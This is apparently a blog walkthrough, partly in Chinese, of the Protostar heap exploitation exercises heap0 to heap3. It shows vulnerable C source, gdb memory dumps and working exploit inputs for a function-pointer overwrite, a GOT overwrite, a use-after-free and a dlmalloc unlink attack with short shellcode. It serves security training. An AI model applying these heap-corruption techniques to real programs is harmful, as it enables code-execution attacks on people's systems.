exploit-exercises Protostar Heap Walkthrough


Protostar Heap0


This level introduces heap overflows and how they can influence code flow.

This level is at /opt/protostar/bin/heap0

Source code

{% code title=“heap0.c” %}

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>

struct data {
  char name[64];

struct fp {
  int (*fp)();

void winner()
  printf("level passed\n");

void nowinner()
  printf("level has not been passed\n");

int main(int argc, char **argv)
  struct data *d;
  struct fp *f;

  d = malloc(sizeof(struct data));
  f = malloc(sizeof(struct fp));
  f->fp = nowinner;

  printf("data is at %p, fp is at %p\n", d, f);

  strcpy(d->name, argv[1]);


{% endcode %}



(gdb) b *0x08048500
Breakpoint 1 at 0x8048500: file heap0/heap0.c, line 40.

(gdb) r AAAA
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /opt/protostar/bin/heap0 AAAA
data is at 0x804a008, fp is at 0x804a050
level has not been passed

Breakpoint 1, 0x08048500 in main (argc=134513804, argv=0x2) at heap0/heap0.c:40
40    in heap0/heap0.c


(gdb) info proc map
process 1605
cmdline = '/opt/protostar/bin/heap0'
cwd = '/opt/protostar/bin'
exe = '/opt/protostar/bin/heap0'
Mapped address spaces:

    Start Addr   End Addr       Size     Offset objfile
     0x8048000  0x8049000     0x1000          0        /opt/protostar/bin/heap0
     0x8049000  0x804a000     0x1000          0        /opt/protostar/bin/heap0
     0x804a000  0x806b000    0x21000          0           [heap]
    0xb7e96000 0xb7e97000     0x1000          0

(gdb) x/30x 0x804a008
0x804a008:    0x41414141    0x00000000    0x00000000    0x00000000
0x804a018:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a028:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a038:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a048:    0x00000000    0x00000011    0x08048478    0x00000000
0x804a058:    0x00000000    0x00020fa9    0x00000000    0x00000000
0x804a068:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a078:    0x00000000    0x00000000

(gdb) x/10x 0x804a050
0x804a050:    0x08048478    0x00000000    0x00000000    0x00020fa9
0x804a060:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a070:    0x00000000    0x00000000

(gdb) disass nowinner
Dump of assembler code for function nowinner:
0x08048478 <nowinner+0>:    push   ebp
0x08048479 <nowinner+1>:    mov    ebp,esp
0x0804847b <nowinner+3>:    sub    esp,0x18
0x0804847e <nowinner+6>:    mov    DWORD PTR [esp],0x80485dd
0x08048485 <nowinner+13>:    call   0x8048398 <puts@plt>
0x0804848a <nowinner+18>:    leave
0x0804848b <nowinner+19>:    ret
End of assembler dump.

(gdb) p 0x804a050 - 0x804a008
$1 = 72

二者地址相差72个字节,所以我们通过填充72个字符,后面跟上winner()的地址(通过objdump -t heap0 查看),就可以将f->fp改成指向winner函数,然后进行调用。

user@protostar:/opt/protostar/bin$ ./heap0 $(python -c "print('A'*72 + '\x64\x84\x04\x08')")
data is at 0x804a008, fp is at 0x804a050
level passed

Protostar heap1


This level takes a look at code flow hijacking in data overwrite cases.

This level is at /opt/protostar/bin/heap

Source code

{% code title=“heap1.c” %}

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>

struct internet {
  int priority;
  char *name;

void winner()
  printf("and we have a winner @ %d\n", time(NULL));

int main(int argc, char **argv)
  struct internet *i1, *i2, *i3;

  i1 = malloc(sizeof(struct internet));
  i1->priority = 1;
  i1->name = malloc(8);

  i2 = malloc(sizeof(struct internet));
  i2->priority = 2;
  i2->name = malloc(8);

  strcpy(i1->name, argv[1]);
  strcpy(i2->name, argv[2]);

  printf("and that's a wrap folks!\n");

{% endcode %}


(gdb) r AAAA 0000
Starting program: /opt/protostar/bin/heap1 AAAA 0000

Breakpoint 1, main (argc=3, argv=0xbffff814) at heap1/heap1.c:34
34    heap1/heap1.c: No such file or directory.
    in heap1/heap1.c
// 查看堆地址,得到 0x804a000
(gdb) info proc map
process 1617
cmdline = '/opt/protostar/bin/heap1'
cwd = '/opt/protostar/bin'
exe = '/opt/protostar/bin/heap1'
Mapped address spaces:

    Start Addr   End Addr       Size     Offset objfile
     0x8048000  0x8049000     0x1000          0        /opt/protostar/bin/heap1
     0x8049000  0x804a000     0x1000          0        /opt/protostar/bin/heap1
     0x804a000  0x806b000    0x21000          0           [heap]
    0xb7e96000 0xb7e97000     0x1000          0
// 查看一下堆中的内容
(gdb) x/64wx  0x804a000
0x804a000:    0x00000000    0x00000011    0x00000001    0x0804a018
0x804a010:    0x00000000    0x00000011    0x41414141    0x00000000
0x804a020:    0x00000000    0x00000011    0x00000002    0x0804a038
0x804a030:    0x00000000    0x00000011    0x30303030    0x00000000
0x804a040:    0x00000000    0x00020fc1    0x00000000    0x00000000
0x804a050:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a060:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a070:    0x00000000    0x00000000    0x00000000    0x00000000

结构体internet中有一个指向char类型的指针 name,在程序的最后进行了两次strcpy操作,可以实现溢出。如果我们将i2->name 的地址进行覆盖,通过第二个strcpy能够做到任意位置写入数据。


0x08048547 <main+142>:    mov    eax,DWORD PTR [esp+0x18]
0x0804854b <main+146>:    mov    eax,DWORD PTR [eax+0x4]
0x0804854e <main+149>:    mov    DWORD PTR [esp+0x4],edx
0x08048552 <main+153>:    mov    DWORD PTR [esp],eax
0x08048555 <main+156>:    call   0x804838c <strcpy@plt>
0x0804855a <main+161>:    mov    DWORD PTR [esp],0x804864b
0x08048561 <main+168>:    call   0x80483cc <puts@plt>
0x08048566 <main+173>:    leave
---Type <return> to continue, or q <return> to quit---
0x08048567 <main+174>:    ret
End of assembler dump.
// 可以看到,调用puts时进行了一次跳转,目的地址是0x8049774,这个地址的内容是下一条指令的地址
// 这里涉及到了动态链接,暂时先不介绍了,但是我们知道如果将地址是0x8049774的内容改成winner函数的地址
// 就可以调用winner了
(gdb) disass 0x80483cc
Dump of assembler code for function puts@plt:
0x080483cc <puts@plt+0>:    jmp    DWORD PTR ds:0x8049774
0x080483d2 <puts@plt+6>:    push   0x30
0x080483d7 <puts@plt+11>:    jmp    0x804835c
End of assembler dump.

(gdb) x 0x8049774
0x8049774 <_GLOBAL_OFFSET_TABLE_+36>:    0x080483d2

(gdb) p winner
$1 = {void (void)} 0x8048494 <winner>


user@protostar:/opt/protostar/bin$ ./heap1 `echo -e "AAAABBBBCCCCDDDDEEEE\x74\x97\x04\x08"` `echo -e "\x94\x84\x04\x08"`
and we have a winner @ 1596724910

Protostar heap2


This level examines what can happen when heap pointers are stale.

This level is completed when you see the “you have logged in already!” message

This level is at /opt/protostar/bin/heap2

Source code

{% code title=“heap2.c” %}

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

struct auth {
  char name[32];
  int auth;

struct auth *auth;
char *service;

int main(int argc, char **argv)
  char line[128];

  while(1) {
    printf("[ auth = %p, service = %p ]\n", auth, service);

    if(fgets(line, sizeof(line), stdin) == NULL) break;

    if(strncmp(line, "auth ", 5) == 0) {
      auth = malloc(sizeof(auth));
      memset(auth, 0, sizeof(auth));
      if(strlen(line + 5) < 31) {
        strcpy(auth->name, line + 5);
    if(strncmp(line, "reset", 5) == 0) {
    if(strncmp(line, "service", 6) == 0) {
      service = strdup(line + 7);
    if(strncmp(line, "login", 5) == 0) {
      if(auth->auth) {
        printf("you have logged in already!\n");
      } else {
        printf("please enter your password\n");

{% endcode %}

我们分配一个auth结构,并通过传递reset命令将其释放。会发现,即使你将刚才通过malloc分配的内存通过free释放掉,由于指针没有置空,还是指向那块内存的。 接下来,我们使用service命令调用strdup()函数,该函数用于复制字符串,返回指向被复制的字符串的指针,所需空间由malloc()分配。 我们看到strdup()在与释放的auth结构相同的位置分配内存。

user@protostar:/opt/protostar/bin$ ./heap2
[ auth = (nil), service = (nil) ]
auth aaaa
[ auth = 0x804c008, service = (nil) ]
[ auth = 0x804c008, service = (nil) ]
service bbbb
[ auth = 0x804c008, service = 0x804c008 ]


user@protostar:/opt/protostar/bin$ ./heap2
[ auth = (nil), service = (nil) ]
auth aaa
[ auth = 0x804c008, service = (nil) ]
[ auth = 0x804c008, service = (nil) ]
[ auth = 0x804c008, service = 0x804c018 ]
you have logged in already!

Protostar Heap3


This level introduces the Doug Lea Malloc (dlmalloc) and how heap meta data can be modified to change program execution.

This level is at /opt/protostar/bin/heap3

Source code

{% code title=“heap3.c” %}

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

void winner()
  printf("that wasn't too bad now, was it? @ %d\n", time(NULL));

int main(int argc, char **argv)
  char *a, *b, *c;

  a = malloc(32);
  b = malloc(32);
  c = malloc(32);

  strcpy(a, argv[1]);
  strcpy(b, argv[2]);
  strcpy(c, argv[3]);


  printf("dynamite failed?\n");

{% endcode %}

Heap在C程序中用于动态内存管理libc提供了一个易于使用的接口(malloc / free)来分配和取消分配内存区域。 Protostar中的libc版本使用malloc的实现(称为dlmalloc),以其原始创建者Doug Lea的名字命名。 malloc使用的控制结构与数据存储在一起,从而在堆缓冲区可能溢出时允许对控制结构进行操作。

一个已经分配的 chunk 的样子如下。我们称前两个字段称为 chunk header,后面的部分称为 user data。每次 malloc 申请得到的内存指针,其实指向 user data 的起始处。

被释放的 chunk 被记录在链表中(可能是循环双向链表,也可能是单向链表)。具体结构如下

  • Prev_size,如果该 chunk 的物理相邻的前一地址 chunk是空闲的话,那该字段记录的是前一个 chunk 的大小 (包括 chunk 头)。否则,该字段可以用来存储物理相邻的前一个 chunk 的数据。这里的前一 chunk 指的是较低地址的 chunk
  • size ,该 chunk 的大小,大小必须是 2 SIZE_SZ 的整数倍。32 位系统中,SIZE_SZ 是 4;64 位系统中,SIZE_SZ 是 8该字段的低三个比特位对 chunk 的大小没有影响,它们从高到低分别表示
    • A:记录当前 chunk 是否不属于主线程,1 表示不属于,0 表示属于。
    • M:记录当前 chunk 是否不属于主线程,1 表示不属于,0 表示属于。
    • P:记录前一个 chunk 块是否被分配。一般来说,堆中第一个被分配的内存块的 size 字段的 P 位都会被设置为 1,以便于防止访问前面的非法内存。当一个 chunk 的 size 的 P 位为 0 时,我们能通过 prev_size 字段来获取上一个 chunk 的大小以及地址。这也方便进行空闲 chunk 之间的合并。
  • fd,bk。 chunk 处于分配状态时,从 fd 字段开始是用户的数据。chunk 空闲时,会被添加到对应的空闲管理链表中,其字段的含义如下
    • fd 指向下一个(非物理相邻)空闲的 chunk
    • bk 指向上一个(非物理相邻)空闲的 chunk
    • 通过 fd 和 bk 可以将空闲的 chunk 块加入到空闲的 chunk 块链表进行统一管理




(gdb) b *0x080488be
Breakpoint 1 at 0x80488be: file heap3/heap3.c, line 18.
(gdb) b *0x080488f2
Breakpoint 2 at 0x80488f2: file heap3/heap3.c, line 22.
(gdb) b *0x0804892e
Breakpoint 3 at 0x804892e: file heap3/heap3.c, line 28.
(gdb) b *0x0804893a
Breakpoint 4 at 0x804893a: file heap3/heap3.c, line 29.

Starting program: /opt/protostar/bin/heap3 AAAA BBBB CCCC

Breakpoint 1, 0x080488be in main (argc=4, argv=0xbffff804) at heap3/heap3.c:18
18    heap3/heap3.c: No such file or directory.
    in heap3/heap3.c

(gdb) x/50wx 0x804c000
0x804c000:    0x00000000    0x00000029    0x41414141    0x00000000
0x804c010:    0x00000000    0x00000000    0x00000000    0x00000000
0x804c020:    0x00000000    0x00000000    0x00000000    0x00000029
0x804c030:    0x42424242    0x00000000    0x00000000    0x00000000
0x804c040:    0x00000000    0x00000000    0x00000000    0x00000000
0x804c050:    0x00000000    0x00000029    0x00000000    0x00000000
0x804c060:    0x00000000    0x00000000    0x00000000    0x00000000
0x804c070:    0x00000000    0x00000000    0x00000000    0x00000f89
0x804c080:    0x00000000    0x00000000    0x00000000    0x00000000
0x804c090:    0x00000000    0x00000000    0x00000000    0x00000000
0x804c0a0:    0x00000000    0x00000000    0x00000000    0x00000000
0x804c0b0:    0x00000000    0x00000000    0x00000000    0x00000000
0x804c0c0:    0x00000000    0x00000000

可以看到,chunk header中的第一个字段prev_size0size字段中看到0x29,则当前块的大小为40(十六进制0x28),并且上一个块正在使用中,也就是最低位P为1。调用malloc时,它将初始化prev_size和size并紧随其后返回内存的地址(上图中的mem)。对于使用的chunk,将忽略表示为fd和bk的字段,并将存储器用于程序数据。


然后看一下free后的heap中的布局,现在,我们看到了一些意外的情况。 首先,prev_size在所有chunk中仍为0但它的值应该是前一个chunk的大小。 其次,虽然fd正确指向了下一个空闲的chunk,但bk似乎没有设置。还有,尚未设置size字段的最低有效位以指示先前的块是空闲的。 这是怎么回事?


之所以无法按预期方式工作,是因为分配的缓冲区很小。 当块小于64字节(默认情况下)时,malloc将使用简化的数据结构(fastbin),并将忽略prev_size,bk和size的最低位。 那么,如果所有块都很小,为什么我们要讨论所有这些字段呢? 我们需要malloc将这些块视为常规块,而不是fastbin块。

当在chunk上调用free时,如果在要释放的chunk附近(紧接在此之前或之后)有空闲块,则free会将它们合并为更大的空闲块。 空闲块存储在一个双向链接的列表中(暂时忽略fastbin chunks),进行合并时,free将从列表中删除正在合并的相邻空闲块,因为它将成为新的更大块的一部分 。


if( next adjacent chunk is free ){
  unlink next adjacent chunk;
  increase the size of the current chunk to include next adjacent chunk;
if( previous adjacent chunk is free ){
  unlink previous adjacent chunk;
  increase the size of the previous adjacent chunk to include the current chunk;

Unlink部分是通过“ unlink”宏完成的,这是简化版本:

#define unlink(P, BK, FD) { \
  FD = P->fd;               \
  BK = P->bk;               \
  FD->bk = BK;              \
  BK->fd = FD;              \



因此,unlink基本上将P->bk的值写入地址(P->fd)+ 12的内存中,并将P->fd的值写入地址(P->bk)+ 8的内存中。 更改的内存以蓝色突出显示。 如果我们可以控制P->fdP->bk的值,则可以覆盖任意内存,其限制是(P->fd)+ 12(P->bk)+ 8都必须是可写的。

0x0804892e <main+165>:    mov    DWORD PTR [esp],0x804ac27
0x08048935 <main+172>:    call   0x8048790 <puts@plt>
0x0804893a <main+177>:    leave
0x0804893b <main+178>:    ret
End of assembler dump.
(gdb) disass 0x8048790
Dump of assembler code for function puts@plt:
0x08048790 <puts@plt+0>:    jmp    DWORD PTR ds:0x804b128
0x08048796 <puts@plt+6>:    push   0x68
0x0804879b <puts@plt+11>:    jmp    0x80486b0
End of assembler dump.
(gdb) x 0x804b128
0x804b128 <_GLOBAL_OFFSET_TABLE_+64>:    0x08048796


我们将调用winner函数的shellcode放在堆上的某个位置,然后更改chunk的标志位,使其在free的时候调用unlink函数,将shellcode写入到GOT表中。 该chunk将在fd字段中包含0x0804b11c =(0x0804b128-12),在bk字段中包含shellcode的地址。 我们不能将Winner()的地址写入bk,因为,BK->fd也将作为unlink的一部分进行更新,但是代码段是不可写的。所以我们需要两个具有写权限的段,一个是GOT表一个就是heap,我们将shellcode写入heap中,然后将shellcode的地址通过unlink写入到GOT表中,这样就成功了。

我们首先需要通过堆溢出更改chunk的大小,使其被当成常规块处理。写入sizeprev_size需要使用NULL字节,我们无法这样做,因为我们参数传递给程序的任何NULL字节都将被strcpy视为字符串终止符。Phrack的文章Once upon a free()描述了避免此问题的技巧。 如果我们提供类似0xFFFFFFFC的值(-4为有符号整数),则分配器将不会将chunk放置在fastbin中,因为0xFFFFFFFC的值比64大得多。



如果我们可以对此chunk进行free调用,它将导致puts @ GOT的值替换为我们的shellcode地址。 注意,shellcode应该是超短的(8个字节或更少),因为**“ shellcode的地址” +8处的内存将被unlink覆盖**。


{% code title=“exp.py” %}

print("AAAAAAAA" + "\xb8\x64\x88\x04\x08\xff\xd0")

{% endcode %}

{% code title=“exp1.py” %}

print("A"*32 + '\xfc\xff\xff\xff'*2)

{% endcode %}

{% code title=“exp2.py” %}

import struct

puts = 0x804b128 - 12
shellcode = 0x804c010
print('AAAA' + struct.pack('I', puts) + struct.pack('I', shellcode))

{% endcode %}

user@protostar:~$ /opt/protostar/bin/heap3 `python exp.py ` `python exp1.py ` `python exp2.py `
that wasn't too bad now, was it? @ 1596958003
Segmentation fault


(gdb) r `python exp.py ` `python exp1.py ` `python exp2.py `
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/heap3 `python exp.py ` `python exp1.py ` `python exp2.py `

Breakpoint 2, main (argc=4, argv=0xbffff7f4) at heap3/heap3.c:24
24    in heap3/heap3.c
(gdb) x/50wx 0x804c000
0x804c000:    0x00000000    0x00000029    0x41414141    0x41414141
0x804c010:    0x048864b8    0x00d0ff08    0x00000000    0x00000000
0x804c020:    0x00000000    0x00000000    0x00000000    0x00000029
0x804c030:    0x41414141    0x41414141    0x41414141    0x41414141
0x804c040:    0x41414141    0x41414141    0x41414141    0x41414141
0x804c050:    0xfffffffc    0xfffffffc    0x41414141    0x0804b11c
0x804c060:    0x0804c010    0x00000000    0x00000000    0x00000000
0x804c070:    0x00000000    0x00000000    0x00000000    0x00000f89
0x804c080:    0x00000000    0x00000000    0x00000000    0x00000000
0x804c090:    0x00000000    0x00000000    0x00000000    0x00000000
0x804c0a0:    0x00000000    0x00000000    0x00000000    0x00000000
0x804c0b0:    0x00000000    0x00000000    0x00000000    0x00000000
0x804c0c0:    0x00000000    0x00000000
(gdb) c

Breakpoint 1, main (argc=4, argv=0xbffff7f4) at heap3/heap3.c:28
28    in heap3/heap3.c
(gdb) x/50wx 0x804c000
0x804c000:    0x00000000    0x00000029    0x0804c028    0x41414141
0x804c010:    0x048864b8    0x00d0ff08    0x0804b11c    0x00000000
0x804c020:    0x00000000    0x00000000    0x00000000    0x00000029
0x804c030:    0x00000000    0x41414141    0x41414141    0x41414141
0x804c040:    0x41414141    0x41414141    0x41414141    0xfffffff8
0x804c050:    0xfffffffc    0xfffffffc    0xfffffff9    0x0804b194
0x804c060:    0x0804b194    0x00000000    0x00000000    0x00000000
0x804c070:    0x00000000    0x00000000    0x00000000    0x00000f89
0x804c080:    0x00000000    0x00000000    0x00000000    0x00000000
0x804c090:    0x00000000    0x00000000    0x00000000    0x00000000
0x804c0a0:    0x00000000    0x00000000    0x00000000    0x00000000
0x804c0b0:    0x00000000    0x00000000    0x00000000    0x00000000
0x804c0c0:    0x00000000    0x00000000
(gdb) c
that wasn't too bad now, was it? @ 1596957798

Program received signal SIGSEGV, Segmentation fault.
0x0804c017 in ?? ()


  • https://medium.com/@airman604/protostar-heap-3-walkthrough-56d9334bcd13

  • https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/heap_structure-zh/

  • https://www.ayrx.me/protostar-walkthrough-heap#toc-2"





当前余额3.43前往充值 >
领取后你会自动成为博主和红包主的粉丝 规则
钱包余额 0


